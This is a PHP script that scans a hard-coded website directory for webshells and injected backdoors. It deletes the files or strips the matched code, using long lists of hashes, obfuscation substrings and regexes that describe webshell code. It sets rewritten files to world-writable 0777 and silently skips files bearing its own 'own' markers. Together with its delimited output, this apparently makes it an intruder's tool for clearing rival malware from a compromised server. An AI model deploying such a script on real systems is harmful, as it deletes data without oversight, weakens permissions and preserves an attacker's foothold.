<?php function i($i) { echo '{->|' . $i . '|<-}'; } function searchDirs($dir, &$info) { $files = scandir($dir); foreach ($files as $file) { if ($file == '.' || $file == '..') { continue; } $real_dir = $dir . "/" . $file; $real_dir = str_replace("//", "/", $real_dir); if (is_link($real_dir)) { continue; } if (is_file($real_dir) ) { $info['file_count']++; $size = filesize($real_dir); if($size < 1000000 && stripos($real_dir, '.php') !== false){ @chmod($real_dir, 0644); $content = file_get_contents($real_dir); if(pass($real_dir, $content, $info)) { continue; } if (strpos($real_dir, 'lock360.php') !== false) { if(@unlink($real_dir) == true) { $trojan = array( 'path' => $real_dir, 'status' => 1 ); $info['trojan'][] = $trojan; } } clearWithPreg($real_dir, $content, $info); deleteTrojan($real_dir, $content, $size,$info); } continue; } searchDirs($real_dir, $info); } } function clearWithPreg($real_dir, $content, &$info) { $feature = array( array("check" => '$bkindex', "preg"=>'\$index = \$_S.+?ht,0444[^}]+}[^}]+}'), array("check" => '$bkindex', "preg"=>'\$index = \$_S.+(?=function wp_schedule_event)'), array("check" => '$bkindex', "preg"=>'if\(function_exists\(\'sys_get_temp_dir.+(?=function wp_schedule_event)'), array("check" => '$bkidex', "preg"=>'\$inxdex = \$_S.+\'292\'\); } }'), array("check" => '//ckIIend', "preg"=>'\/\/ckIIbg.+?\/\/ckIIend'), array("check" => '//ckIIbg', "preg"=>'\/\/ckIIbg.+?nowIndexFile,0555.+?}.+?}'), array("check" => '$ruzhu_php_jm', "preg"=>'\$do.+?ruzhu_php_jm.+?2018-09-10 20:28:01"\);}'), array("check"=>'scp-173', "preg"=>'<\?php.+?scp-173\?>'), //array("check"=> 'x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6', "preg"=>'\$ZdJ=.+?Qj=="\);'), array("check"=> 'x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6', "preg"=>'<\?php error_reporting\(0\);.+?\?>'), array("check"=> '\x34\x35\x34\x33\x63\x68\x64\x69\x72\x65\x78\x65\x63\x70\x68\x70\x70\x73', "preg"=> '<\?php error_reporting.+?\);}'), array("check"=> 'PCFET0NUWVBFIEhUTUwgUFVCTE', "preg"=> '<\?php.+?PCFET0NUWVBFIEhUTUwgUFVCTE.+?>'), array("check"=> 'file_get_contents($index_path)', "preg"=> '<\?php.+?file_put_contents\(\$index_path, \$index_hide\).+?>'), array("check"=> 'file_get_contents($index_path)', "preg"=> '\$path = ".+?\$htaccess, 0444\);\s+?}\s+?}'), array("check"=> 'open_cache_ruzhu_phpcode', "preg"=> 'error_reporting[^}]+?open_cache_ruzhu_phpcode.+?huan_yuan_htaccess.+?}'), array("check"=>'@include "\\', "preg"=>'@include.+?;'), array("check"=>'global $O', "preg"=>'<\?php @header\(.+\$O\[[0-9]{1,2}\]\);} \?>'), array("check"=>'/* Custom write log to ensure the operation of the website */', "preg"=>'\/\* Custom write log to ensure the operation of the website \*\/.+\$shut\[1\]\(\);'), array("check"=>'function_exists(\'copy\')', "preg"=>'if\(function_exists\(\'copy\'\)\){[^}]+}'), array("check"=>'$get_size_of_file', "preg"=>'\$get_size_of_file.+?call_user_func.+?;}}'), array("check"=>'/* index-configs */', "preg"=>'<\?php \/\* index-configs \*\/.+eval.+\?>'), array("check"=>'$ihx .= "define', "preg"=>'\$i = .+?\$ihx \.=.+?}.+?}'), array("check"=> '@include base64_decode("', "preg" => '@include base64_decode\("[^"]+"\);'), array("check"=> '@include base64_decode(\'', "preg" => '@include base64_decode\(\'[^\']+\'\);'), array("check"=> '@include($f)', "preg" => '\$_HEADERS = getallheaders.+?@unlink\(\$f\);}'), array("check"=> '$i = \'inde\'.\'x.php\'', "preg" => '\$i = \'inde\'\.\'x\.php\';.+?LOCK_EX\);.*?}'), array("check"=> '@call_user_func(', "preg" => '\$f_size =.+@call_user_func.+?}\s+}\s+}'), array("check"=> '$inxxdex', "preg" => '\$inxxdex = .+?\$inxxdex = "";'), array("check"=> '$ixsssxdx', "preg" => '\$ixsssxdx =.+\$ixsssxdx.+?\);\s+}\s+}'), array("check"=> '@include_once', "preg" => '\/\*[a-zA-Z0-9]{4,7}.+?@include_once.+?\/\*[a-zA-Z0-9]{4,7}'), array("check"=> '/** elutguozk fbz **/', "preg" => '<\?php \$.+?\/\*\* elutguozk fbz \*\*\/.+?\?>'), array("check"=> '@include ', "preg" => '@include ".+?";'), array("check"=> '$hct', "preg" => 'if\(\$hct.+\$bksht.+?\);\s+}\s+}'), array("check"=> '$hct', "preg" => 'if\(\$hct.+\wp-emoji-in\.min.+?.+292.+?\);\s+}\s+}'), // //array("check"=>'include "', "preg"=>'include ["\'][^\']+?[^.php]["\'];'), ); foreach ($feature as $item) { $decode_item = $item['check']; if (strpos($content, $decode_item) !== false){ //$content = file_get_contents($real_dir); $old_length = strlen($content); $content = preg_replace('/' .$item['preg'].'/si', "", $content); @chmod($real_dir, 0777); $new = @file_put_contents($real_dir, $content); $hide_code = array( 'path' => $real_dir, 'feature' => $item['check'], 'old_length' => $old_length, 'new_length' => strlen($content), 'written_length' => $new ); $info['hide_code'][] = $hide_code; } } } function deleteTrojan($real_dir, $content, $size, &$info){ $content_md5 = md5($content); $feature = array("3ed2bcd9af3a8a4cc6a2d64c0e29323a","4500d7207ae89f588ae6bb46dc4cfc4c",'e95257e2f87a5324faa741d7bd256d10','380fa777b8c37fb60811e5972391261b','af92294c9e7d5f25ca0f7ec2371a830d','656fd2931ced4e62f2b73b065c1cb834','a9939c9ec3f1c09aba4a9c031b69d5b1','e72a4bad8eeb37181a5ac116073a0f2f','565ae477a280cb823d049e0e99c069b9','f2820d0981f75a2dae76e1ef4d628fe3','f66c24dd3c20ae8d4c2e71b27d4a3a2c','6bcb1a0971168190045636f83c490226','7c20feb7139226fbbbaa6d962adf5a75', '0c76ba322ca7009f0a155fce8dbbd9e0', 'e23b765107d824560a1edbb9e98f7ad7', '00c121a6f126196a2f159aaacb59a94d', '4056a2010da76111934c397f989bc1bc', 'fe8363339acbf327271cd5dc6843098b', 'b263f5b0dfcce9774f6e70f0932afcf2', 'cdf89ad3c74d0d6f4ce88eaa578440e8', '0152b6b8bc439e5cc3f8fde49952e470','1e499ce31b1879197b746d50aa21901e','82e89c090162303f2b95f0b916c2e1e6','1970fbfd414373d0c98ab147b9cb2022','c530b3e97a4642da2eab74d9b4f2d61c','2f1c426b9c3e4b01427bdc69262ee8de','bcec677bac0083b7c4a0849ccaa0f711', '8827c82e802c7d4df006148fd14e9ebc','363f04ba317bed872f62d2d9e6fdae19','5db85c130f31f2cb623d5a285997a704','b857f22b00098f85aa4d77acd58df73c','770616aff8677a033e946f6f01eb6ba3', '112fc0af846dc2f6664f1a68f6f53594','893e4dde777558cc5fec4276c5a94dc0','d39ac622537d80caf7cb630899250e00','dacc0f895428822979bda234f4f15bfe','8dec392ede6ffafe434b401cf8e59cee','1a09efdc2d5a1f8b31132238651df3fb','a55395546859b922c4b7808b959043c0','aba3d13150cba65a25a974f6f66e25a4','4f6ca51ca0eba1c4ec9dab8f7fbfa87d','2240b1ed64d66a77d365934b42303ae9','bc747ff54ee849a60d2eb86208796115','b69bf8f5901d6be8fa239591fe752f39','ab3ab227167426b00efe41924ff86190','89d91ddee6f715acba63dc9e03e86de0','f67cf7731c19a10d0549419cef9619f0' ); $feature_for_contain = array( '"bas"."e64_d"."ecode"', "'base64','_deco','de'", '"ba" . "se6" . "4"', "'helloword','create_','hellowordfunction'", 'I could not have a more welcome visitor 64 group of zain bani', '_=\'Loading Class/Code NAME\'', 'PHP Encode v1.0 by zeura.com', 'get1_str($str1)', '$_GET[\'ername\']', 'isset($_POST[\'f_p\'])', 'cb508614978e98198cb3d9c89d0fc47f' ); foreach ($feature as $item) { if ($content_md5 == $item) { if(@unlink($real_dir) == true) { $trojan = array( 'path' => $real_dir, 'status' => 1 ); } else { $trojan = array( 'path' => $real_dir, 'status' => 0 ); } $info['trojan'][] = $trojan; } } foreach ($feature_for_contain as $item) { if (strpos($content, $item) !== false) { if(@unlink($real_dir) == true) { $trojan = array( 'path' => $real_dir, 'status' => 1, 'feature' => $item ); } else { $trojan = array( 'path' => $real_dir, 'status' => 0, 'feature' => $item ); } $info['trojan'][] = $trojan; } } $result = other($size, $content, $real_dir); if($result != '') { if(@unlink($real_dir) === true) { $trojan = array( 'path' => $real_dir, 'status' => 1, 'feature' => $result ); } else { file_put_contents($real_dir, ''); $trojan = array( 'path' => $real_dir, 'status' => 0, 'feature' => $result ); } $info['trojan'][] = $trojan; } } function checkSize($fileSize, $checkSize){ $status = false; if(abs($fileSize - $checkSize) < 250){ $status = true; } return $status; } function other1($size, $txt, $realDir){ if(strstr($txt,'null;@eval(') && strstr($txt,'};$')){ return 'other1'; } if(strstr($txt, 'get_str') && strstr($txt, 'str_rot13') && strstr($txt, '@eval(')){ return 'other2'; } if(strstr($txt, 'ignore_user_abort') && strstr($txt, "@include(pack(")){ return 'other3'; } if(strstr($txt, 'base64_decode') && strstr($txt, "@chmod") && strstr($txt, '=="') && !strstr($txt, 'cpa_ind5.php')){ return 'other4'; } if(strstr($txt, 'gzuncompress(strrev(') && strstr($txt, "create_function") && checkSize($size, 22534)){ return 'other5'; } if(strstr($txt, 'cdn.jsdelivr.net') && strstr($txt, "sweetalert.min.js") && checkSize($size, 13695)){ return 'other6'; } if(strstr($txt, ')return') && strstr($txt, "}else{function")){ return 'other7'; } if(strstr($txt, 'class_uc_key') && strstr($txt, "hexdec") && checkSize($size, 60048)){ return 'other8'; } if(strstr($txt, 'require(@$') && strstr($txt, "error_reporting(0);") && strstr($txt, "set_time_limit(0);")){ return 'other9'; } if(strstr($txt, '$_post') && strstr($txt, '$_cookie') && strstr($txt, 'md5(') && strstr($txt, '@setcookie') && strstr($txt, 'create_function')){ return 'other10'; } return ''; } function other2($size, $txt, $realDir){ if(strstr($txt, ';@include(') && strstr($txt, '$_post') && strstr($txt, '$_cookie') && strstr($txt, 'return @$')){ return 'other11'; } if(strstr($txt, "getcwd") && strstr($txt, 'file_exists') && strstr($txt, '@chdir') && strstr($txt, '@scandir')){ return 'other12'; } if(strstr($txt, '.chr(') && strstr($txt, "@include(") && strstr($txt, "chr(ord($")){ return 'other13'; } if(strstr($txt, 'register_key') && strstr($txt, "kaylin") && checkSize($size, 86523)){ return 'other14'; } if((strstr($txt, "base64_decode") || strstr($txt, 'error_reporting')) && strstr($txt, '"display_errors"') && strstr($txt, 'function_exists')){ return 'other15'; } if(strstr($txt, "base64_decode") && strstr($txt, 'fwrite') && strstr($txt, '.php?pass=')){ return 'other16'; } if(strstr($txt, '$_server["\x') && strstr($txt, "serialize")){ return 'other17'; } if(strstr($txt, 'parse_str') && strstr($txt, "<?=") && !strstr($txt, 'highlighter')){ return 'other18'; } if(strstr($txt, 'eval(') && strstr($txt, "foxauto")){ return 'other19'; } if(strstr($txt, 'eval(') && strstr($txt, 'rawurldecode(') && strstr($txt, 'function%20')){ return 'other20'; } return ''; } function other3($size, $txt, $realDir) { if(strstr($txt, '$g($b($c))') && strstr($txt, "_dec") && checkSize($size, 7563)){ return 'other21'; } if(strstr($txt, '$_post[') && strstr($txt, "eval(") && strstr($txt, ";@$") && checkSize($size, 453)){ return 'other22'; } if(strstr($txt, 'filemtime') && strstr($txt, "preg_match('#<") && checkSize($size, 21596)){ return 'other23'; } if(strstr($txt, 'parse_str') && strstr($txt, "eval") && strstr($txt, "'1=%'")){ return 'other24'; } if(strstr($txt, 'php_uname') && strstr($txt, "move_uploaded_file") && checkSize($size, 1133)){ return 'other25'; } if(strstr($txt, 'dehex(') && strstr($txt, "/etc/named.conf") && strstr($txt, '$_files["uploadfile"]')){ return 'other26'; } if(strstr($txt, '?><?php') && strstr($txt, ");$") && strstr($txt, "'}'")){ return 'other27'; } if(strstr($txt, 'function_exists') && strstr($txt, ");@$") && strstr($txt, '.="\x')){ return 'other28'; } if(strstr($txt, '"\1') && strstr($txt, "gettype") && (strstr($txt, ";@$") || strstr($txt, "count"))){ return 'other29'; } if(strstr($txt, "return 'other'.$") && strstr($txt, '},$') && strstr($txt, '});$')){ return 'other30'; } return ''; } function other4($size, $txt, $realDir) { if(strstr($txt, '"\r\n"') && strstr($txt, '= @$') && strstr($txt, 'new ') && strstr($txt, 'chr($')){ return 'other31'; } if(strstr($txt, 'index.php') && strstr($txt, '@file_put_contents') && strstr($txt, 'xiaoxiannv')){ return 'other32'; } if(strstr($txt, ';@$') && strstr($txt, ")].$") && strstr($txt, "(('')")){ return 'other33'; } if(strstr($txt, ']];$') && strstr($txt, "base64_decode") && strstr($txt, "mktime")){ return 'other34'; } if((strstr($txt, '_files') || strstr($txt, 'base64_decode')) && strstr($txt, '_get') && (strstr($txt, "error_reporting") || strstr($txt, "ignore_user_abort") || strstr($txt, "fm_convert_win")) && strstr($txt, 'set_time_limit') && !strstr($realDir, '.min.js') && !strstr($txt, 'updraftplus') && !strstr($txt, 'EASYPOPULATE_CONFIG')){ return 'other35'; } if(strstr($txt, '$_post') && (strstr($txt, 'file_put_contents') || strstr($txt, "fopen")) && strstr($txt, 'error_') && strstr($txt, 'script') && strstr($txt, '_files') && (strstr($txt, 'opendir') || strstr($txt, 'scandir')) && strstr($txt, 'chmod') && strstr($txt, 'filesize') && strstr($txt, 'ini_') && strstr($txt, 'exec(')){ return 'other36'; } if(strstr($txt, 'php_uname') && strstr($txt, "mail(") && strstr($txt, "json_encode") && strstr($txt, '$_get') && strstr($txt, 'curl_exec')){ return 'other37'; } if(strstr($txt, "eval('?>'.$") && !strstr($txt, 'mustache')){ return 'other38'; } if(strstr($txt, 'eval(') && (strstr($txt, "base64_decode(") || strstr($txt, '\x6') || strstr($txt, 'openssl_decrypt'))){ return 'other39'; } if(strstr($txt, 'multipart') && strstr($txt, 'type="file"') && (strstr($txt, 'if(@copy') || strstr($txt, '@fopen'))){ return 'other40'; } return ''; } function other5($size, $txt, $realDir) { if((strstr($txt, 'base64_decode') || strstr($txt, '@shmop_open')) && strstr($txt, '$_files') && strstr($txt, '@copy') && !strstr($txt, 'wp_handle_upload_error')){ return 'other41'; } if(strstr($txt, 'goto') && strstr($txt, ": function") && strstr($txt, ": eval(")){ return 'other42'; } if(strpos($txt, 'F-Automatical') && strpos($txt, '$_POST[\'email\']') && strpos($txt, 'Send an report to')) { return 'other43'; } if(strpos($txt, 'goto ') && strpos($txt, 'base64_decode') && strpos($txt, 'symlink')) { return 'other44'; } if(preg_match("/(chr\([0-9]{1,3}\)\.){5}/si", $txt)) { return 'other45'; } if(preg_match_all("/\([0-9]{5}-[0-9]{5}\)/si", $txt, $matches) > 5) { return 'other46'; } if(strpos($txt, '\'log_errors\'') && strpos($txt, '\'error_log\'') && strpos($txt, '\'error_reporting\'')) { return 'other47'; } if(strpos($txt, 'range(chr(126),chr(20));')) { return 'other48'; } if (strpos($txt, '$_POST[\'cmd\'] == "get_file_data"') && strpos($txt, '$_POST[\'cmd\'] == "get_files"') && strpos($txt, '$_POST[\'cmd\'] == "shell_exec"')) { return 'other49'; } if((strpos($txt, "PD9waH") || strpos($txt, "Ym90Ym90Ym90")) && preg_match("/[0-9a-zA-Z\/+]{200,}/si", $txt)) { return 'other50'; } return ''; } function other6($size, $txt, $realDir) { if(strpos($txt, "htaccess_rul") && preg_match("/[0-9a-zA-Z\/+]{200,}/si", $txt)) { return 'other51'; } if(strpos($txt, "%21mod%5B%7C%22D%") && strpos($txt, "gzinflate(base64_decode") && strpos($txt, "curl_exec") ) { return 'other52'; } if(strpos($txt, "WaomRuw") && preg_match("/[0-9a-zA-Z\/+]{200,}/si", $txt)) { return 'other53'; } if(preg_match("/goto [a-zA-Z0-9]{5};/si", $txt)) { return 'other54'; } if(preg_match('/@unlink\(\$[0oO]+\);/si', $txt)) { return 'other55'; } if(strpos($txt, 'eval("\"$A\"");') && strpos($txt, '_POST[911]')) { return 'other56'; } if(strpos($txt, '199093f0455d6e79bb8e4bbe1ae1b86d') && strpos($txt, 'HTTP_USER_AGENT')) { return 'other57'; } if(preg_match('/function [a-z][0-9]\(\$[a-z][0-9], \$[a-z][0-9]{2}\){return @\$[a-z][0-9][[0-9]+]\(\$[a-z][0-9][[0-9]+], \$[a-z][0-9]{2}\);}/si', $txt)) { return 'other58'; } if(strpos($txt, "Create_Function") && preg_match("/[0-9a-zA-Z\/+]{200,}/si", $txt)) { return 'other59'; } if(preg_match('/goto [a-zA-Z]{2};/si', $txt)) { preg_match_all('/goto [a-zA-Z]{2};/si', $txt, $matches); if(count($matches[0]) > 5){ return 'other60'; } } return ''; } function other7($size, $txt, $realDir) { if(strpos($txt, "eval") && strpos($txt, "hex2bin") && preg_match("/[0-9a-zA-Z\/+]{200,}/si", $txt)) { return 'other61'; } if(strpos($txt, "https://glot.io/snippets") || strpos($txt, "https://glot.io/static")) { return 'other62'; } if(strpos($txt, '$pwd=base64_encode($pwd)') && strpos($txt, "eval") && preg_match("/[0-9a-zA-Z\/+]{200,}/si", $txt)) { return 'other63'; } if(preg_match("/[0-9a-zA-Z\/+]{200,}/si", $txt)) { preg_match_all('/\([0-9]{1,3}[-+*\/][0-9]{1,3}\)/si', $txt, $matches); if(count($matches[0]) > 5){ return 'other64'; } } if(strpos($txt, 'Upload $i Files Successfully!') && strpos($txt, "Create Folder Successfully!") && strpos($txt, "Create File Successfully!")) { return 'other65'; } if(strpos($txt, 'empty($_POST[\'email\'])') && strpos($txt, 'Result Report Test - ".$xx,"WORKING !"') && strpos($txt, "send an report")) { return 'other65'; } if(strpos($txt, "loggedIn") && strpos($txt, "EVAL") && preg_match("/[0-9a-zA-Z\/+]{200,}/si", $txt)) { return 'other66'; } if(strpos($txt, 'eval') && strpos($txt, '$_SESSION[$payloadName]') && strpos($txt, "php://input")) { return 'other67'; } if(strpos($txt, "@create_function") && strpos($txt, "base64_decode") && preg_match("/[0-9a-zA-Z\/+]{200,}/si", $txt)) { return 'other68'; } if(strpos($txt, "\$_COOKIE['f_pp']") && strpos($txt, "\$_POST['f_pp']") && preg_match("/[0-9a-zA-Z\/+]{200,}/si", $txt)) { return 'other69'; } if(strpos($txt, "shell519") && strpos($txt, '$shell_content3') && strpos($txt, "read_dir_queue1")) { return 'other70'; } return ''; } function other8($size, $txt, $realDir) { if(strpos($txt, "unlink('.hindexcontent');") && strpos($txt, "wp-content/plugins/akismet") && strpos($txt, "'wp-content/themes")) { return 'other71'; } if(strpos($txt, "bjRficAiyoSn") && strpos($txt, "unlink") && strpos($txt, '$f(')) { return 'other72'; } if(strpos($txt, "https://hastebin.com/raw/") && strpos($txt, "/999MD999.html") && strpos($txt, '$_FILES')) { return 'other73'; } if(strpos($txt, "Shell Bypass 403") && strpos($txt, "unlink(\$_GET['delete']")) { return 'other74'; } if(strpos($txt, "is_cli()") && strpos($txt, "disable_functions") && strpos($txt, "ini_get")) { return 'other75'; } if(strpos($txt, "\$pp6 = Array()") && strpos($txt, "se1(\$we2)") && strpos($txt, "ir7(\$pp6")) { return 'other76'; } if(strpos($txt, "<!-- GIF89;a -->") && strpos($txt, "\$lokasinya") && strpos($txt, "\$_GET['pilihan']")) { return 'other77'; } if(strpos($txt, "\$GNJ[]") && strpos($txt, "\$GNJ[33]") && strpos($txt, "(uhex(")) { return 'other78'; } if(strpos($txt, "smisbot()") && strpos($txt, "\$Prefix") && strpos($txt, "@ignore_user_abort")) { return 'other79'; } if(strpos($txt, "goto VZ") && strpos($txt, "\$_FILES[\"f\"]") && strpos($txt, "http_response_code")) { return 'other80'; } return ''; } function other9($size, $txt, $realDir) { if(strpos($txt, "@set_time_limit(0);") && strpos($txt, "\$_FILES[") && strpos($txt, "\$perms & 0x0100")) { return 'other81'; } if(strpos($txt, "die;") && strpos($txt, "4@MTP*") && strpos($txt, "curl_setopt")) { return 'other82'; } preg_match_all('/\/\*([^*]{5,10})\*\//si', $txt, $matches, PREG_PATTERN_ORDER); if($matches) { if(count($matches[0]) > 10 ) { return 'other83'; } } if(strpos($txt, "header('shell: :)')") && strpos($txt, 'http_response_code(404)') && strpos($txt, '$_FILES[\'a\'][\'name\']')) { return 'other84'; } if(strpos($txt, "case 'batchDel'") && strpos($txt, '删除选中文件') && strpos($txt, '$_SERVER[\'DOCUMENT_ROOT\']')) { return 'other85'; } if(preg_match('/\$[a-zA-Z]+\[\([0-9]+ - [0-9]+\) \/ [0-9]+\]/si', $txt) && preg_match("/[0-9a-zA-Z\/+]{200,}/si", $txt)) { return 'other86'; } if(preg_match_all('/\$x[0-9]+=\$x[0-9]+\(\$_\[[0-9]+\]\);/si', $txt, $matches)> 5) { return 'other87'; } if(strpos($txt, '$_SERVER["\x53\x43\x52\x49\x50\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45"]')) { return 'other88'; } if(strpos($txt, 'www.google.com/ping?sitemap') && strpos($txt, '$_SERVER[\'REQUEST_URI\']') && strpos($txt, 'CURLOPT_URL')) { return 'other89'; } if(strpos($txt, "\$_GET['k']") && strpos($txt, '$_POST[\'cmd\'] == "mkdir"') && strpos($txt, '$_POST[\'cmd\'] == "upload"')) { return 'other90'; } return ''; } function other10($size, $txt, $realDir){ if(strpos($txt, "create_function ") && preg_match("/[0-9a-zA-Z\/+]{200,}/si", $txt)) { return 'other91'; } if(strpos($txt, "class Killbot {") && strpos($txt, "error_reporting();") && strpos($txt, "session_start();")) { return 'other92'; } if(preg_match('/EVaL\(\$[a-zA-Z0-9]{13}\);/si', $txt)) { return 'other93'; } if(strpos($txt, "move_uploaded_file") && strpos($txt, "error_reporting(0)") && strpos($txt, "\$_FILES['file']")) { return 'other94'; } if(strpos($txt, "@\$_POST['css']") && strpos($txt, '@eval("$this->name")')) { return 'other95'; } if(strpos($txt, "@serialize") && strpos($txt, 'md5')&& strpos($txt, '(ord(') && preg_match_all('/\$[^(]+\([0-9]+-[0-9]+\)/si', $txt, $matches)> 5) { return 'other96'; } if(strpos($txt, "<title>Uploader") && strpos($txt, '$_SERVER[\'DOCUMENT_ROOT\']."</br>".php_uname()') && strpos($txt, '$_FILES[\'uploads\'][\'tmp_name\']')) { return 'other97'; } if(strpos($txt, "error_reporting ") && strpos($txt, "display_errors ") && preg_match("/[0-9a-zA-Z\/+]{200,}/si", $txt)) { return 'other98'; } if(strpos($txt, 'file_put_contents($lokasi."/".$_POST[\'namalink\'], @file_get_contents($_POST[\'darilink\']))') && strpos($txt, "Shell")) { return 'other99'; } if(strpos($txt, '@file_put_contents($ps,doutdo($urlc))') && strpos($txt, "ping_sitemap(")) { return 'other100'; } return ''; } function other11($size, $txt, $realDir) { if(strpos($txt, 'error_reporting(0);') && strpos($txt, '["tmp_name"]') && strpos($txt, '$_POST[\'nn\']')) { return 'other101'; } if(strpos($txt, 'define(\'VERSION\',\'kaylin\');') && strpos($txt, 'array_walk') && strpos($txt, 'create_function')) { return 'other102'; } if(preg_match("/[0-9a-zA-Z\/+]{200,}/si", $txt)) { preg_match_all('/\([0-9]+-[0-9]+\)/si', $txt, $matches); if(isset($matches[0]) && count($matches[0]) > 10) { return 'other103'; } if(strpos($txt, 'base64_decode') && strpos($txt, 'ord(')) { return 'other103'; } } if(strpos($txt, '@eval($_POST[$a]);') || strpos($txt, '@eval($_POST[\'google\']);') ) { return 'other104'; } if(strpos($txt, '?upload&q=\' . urlencode(encodePath(PATH))') && strpos($txt, 'move_uploaded_file($_FILES["fileToUpload"]["tmp_name"]')) { return 'other105'; } if(strpos($txt, 'define("HTACCESS", "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .con7ext \n AddHandler cgi-script .con7ext \n AddHandler cgi-script .con7ext");') && strpos($txt, 'dec($GLOBALS["get"]["p"])')) { return 'other106'; } if(strpos($txt, '$bbbb6b6b=explode("1l"') && strpos($txt, '$l1YCy,-1,PREG_SPLIT_NO_EMPTY')) { return 'other107'; } if(strpos($txt, 'eval("eva".bypass()."x\']);");')) { return 'other108'; } if(strpos($txt, '@eval($_mhtc)')) { return 'other109'; } if(preg_match("/unserialize\([_a-zA-Z0-9]+?\([_a-zA-Z0-9]+?\(base64_decode/si", $txt)) { return 'other110'; } return ''; } function other12($size, $txt, $realDir) { if(preg_match("/\/\*[a-zA-Z0-9]{4,7}.+?@include_once.+?\/\*[a-zA-Z0-9]{4,7}/si", $txt)) { return 'other111'; } if(preg_match('/\$i="[-_%a-zA-Z0-9+.]{200,}"/si', $txt)) { return 'other112'; } if(preg_match('/chr\([0-9]{2,4}-[0-9]{2,4}\)"/si', $txt)) { preg_match_all('/chr\([0-9]{2,4}-[0-9]{2,4}\)/si', $txt, $matches); if(isset($matches[0]) && count($matches[0]) > 5) { return 'other113'; } } if(preg_match('/\$arr\[9]/si', $txt)) { preg_match_all('/\$arr\[9]/si', $txt, $matches); if(isset($matches[0]) && count($matches[0]) > 8) { return 'other114'; } } if(preg_match('/\$GLOBALS\["[b6]+"]/si', $txt)) { return 'other115'; } if(strpos($txt, 'a3421fffd6af8a102b26302b9a5103ff') || strpos($txt, '4f7f3da06809dc3d94dacceed40dfaad')|| strpos($txt, 'be54aace58d583f26839a0e8cd1bf90d')) { return 'other116'; } if(preg_match('/\$[_a-z]+\([0-9]{3}-[0-9]{3}\)/si', $txt)) { preg_match_all('/\$[_a-z]+\([0-9]{3}-[0-9]{3}\)/si', $txt, $matches); if(isset($matches[0]) && count($matches[0]) > 8) { return 'other117'; } } if(strpos($txt, 'call_user_func("a\x6cf\x61".$_POST["a"])')) { return 'other118'; } if(strpos($txt, '$f_size="\x66il\x65si\x7ae";$str_rep="\x73tr\x5fre\x70la\x63e";')) { return 'other119'; } if(strpos($txt, '$result = doutdo($url);')) { return 'other200'; } return ''; } function other13($size, $txt, $realDir) { if(strpos($txt, '$RBF7F3NWGUFKX96CBENWGUFKX7DF9B98D6F1F8CF03F8690') || strpos($txt, 'F4F990NWGUFKX8E244NWGUFKX91AAFBE8FC2D360B9F8C3C')|| strpos($txt, 'investingnews.blog/action')) { return 'other201'; } if(strpos($txt, 'is_dir(decodePath($_GET[\'q\']))') || strpos($txt, '?upload&q=\' . urlencode(encodePath(PATH)')|| strpos($txt, '$_FILES["fileToUpload"]["tmp_name"]')) { return 'other202'; } if(strpos($txt, 'while(!@feof($f))') || strpos($txt, 'kill -9 -1')|| strpos($txt, 'do_phpfun')) { return 'other203'; } if(strpos($txt, 'isset($_GET["\x70"])') || strpos($txt, 'goto ')|| strpos($txt, 'do_download')) { return 'other204'; } if(strpos($txt, '@eval($_POST[\'cdshell\'])')) { return 'other205'; } if(strpos($txt, '"\n", "\t", "%", "#", "(", ")", ">", "<", ":", ";", ".", ",", "^", "&", "*", "@", "$"')) { return 'other206'; } if(strpos($txt, 'doggonedrascaldecorous') && strpos($txt, 'usleep(8)')) { return 'other207'; } if(strpos($txt, 'eval($wpautop);')) { return 'other208'; } if(strpos($txt, '$func[14]') && strpos($txt, '$func[29]') && strpos($txt, '$_FILES[\'uploadfile\']')) { return 'other209'; } if(strpos($txt, 'file_get_contents(\'php://input\')') || strpos($txt, 'get_my_files($item);')) { return 'other210'; } return ''; } function other14($size, $txt, $realDir){ if(strpos($txt, '*/@eval/*') || strpos($txt, 'get_my_files($item);')) { return 'other211'; } if(strpos($txt, 'selifnaj') && strpos($txt, 'kkonodnarb')) { return 'other212'; } if(strpos($txt, "\$_GET['bak']") && strpos($txt, 'OK >> $file')) { return 'other213'; } if(strpos($txt, 'eval ($decoded);') || strpos($txt, 'call_user_func("a\x6cf\x61".$_POST["a"]')) { return 'other214'; } if(strpos($txt, "eval(") && strpos($txt, '.curlget(')) { return 'other215'; } if(strpos($txt, "eVAl/*") && strpos($txt, 'curl_exec')) { return 'other216'; } if(strpos($txt, 'chr(ord($') && strpos($txt, 'base64_encode($')) { return 'other217'; } return ''; } function other($size, $txt, $realDir) { for ($i=1; $i<15; $i++) { $f = 'other' . $i; $result = $f($size, $txt, $realDir); if($result != '') { return $result; } } return ''; } function pass($real_dir, $content, &$info) { $feature = ''; if(strpos($content, '@include_once')){ return false; } if (strpos($content, '7c703c76d1a6d63383a19e3a4d6f7895')) { $feature = 'own1'; }; if (strpos($content, '$L7CRgr')) { $feature = 'own2'; } if (strpos($content, 'cAT3VWynuiL7CRgr')) { $feature = 'own3'; } if (strpos($content, 'api=%s&ac=%s&path=%s&t=%s')) { $feature = 'own4'; } if (strpos($content, '"PD9waHA="')) { $feature = 'own5'; } if (preg_match('/\$dp="[a-zA-Z0-9=]+"/si', $content)) { $feature = 'own6'; } if (preg_match('/[A-Za-z]{5}: \$[A-Za-z]{5} = tmpfile\(\); goto/si', $content)) { $feature = 'own7'; } if ($feature != '') { $pass = array( 'path' => $real_dir, 'status' => 0, 'feature' => $feature ); $info['pass'][] = $pass; return true; } return false; } function alwaysUnlink($path, &$info) { $files = [ '/wp-content/uploads/index.php', '/wp-content/uploads/info.log', '/wp-content/plugins/woocommerce/uninstalls.php' ]; foreach ($files as $file) { if(file_exists($path . $file)) { if(unlink($path . $file)) { $info['always_unlinks'][] = 'success unlink:' . $path . $file; } } } } $info = array( 'file_count' => 0, 'hide_count' => 0, 'trojan_count' => 0, 'pass_count' => 0, 'hide_code' => array(), 'trojan' => array(), 'pass' => array(), ); $path = "/home/plataformaeducat/public_html/nacionesunidas"; if($path == "") { searchDirs(dirname(__FILE__) . "/", $info); } else { searchDirs($path, $info); } $info['hide_count'] = count($info['hide_code']); $info['trojan_count'] = count($info['trojan']); $info['pass_count'] = count($info['pass']); $info['always_unlinks'] = ''; if(function_exists('json_encode')) { i(json_encode($info, JSON_PRETTY_PRINT)); }else { echo '{->|'; print_r($info); echo '|<-}'; }